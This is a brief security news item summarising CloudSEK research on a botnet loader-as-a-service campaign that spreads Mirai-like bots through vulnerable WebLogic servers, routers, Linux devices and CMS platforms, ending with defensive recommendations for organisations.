Mirai bots deployed by novel botnet loader-as-a-service

GBHackers News reports that Oracle WebLogic servers, small office home office routers, Linux devices, and CMS platforms have been targeted by a novel botnet loader-as-a-service campaign to facilitate the distribution of Mirai-like bots over the past six months, with attack volumes increasing by 230% from July to August.

Unsanitized POST parameters and default credentials have been leveraged alongside known WebLogic, WordPress, and vBulletin vulnerabilities to achieve remote code execution, according to findings from CloudSEK's TRIAD team.

After using [ReplyPageLogin] to obtain login attempts and subsequently using [ConfigSystemCommand] and [SystemCommand] for injection command capturing, the botnet uses [ReplyDeviceInfo] for post-exploit reconnaissance.

Organizations have been advised to counter such a threat by blocking egress, implementing updated credentials and firmware, adopting Sigma rules for dubious POST parameter discovery, segmenting internet of things and embedded devices, bolstering web UIs, obtaining forensic artifacts, and replacing devices that have reached end-of-life.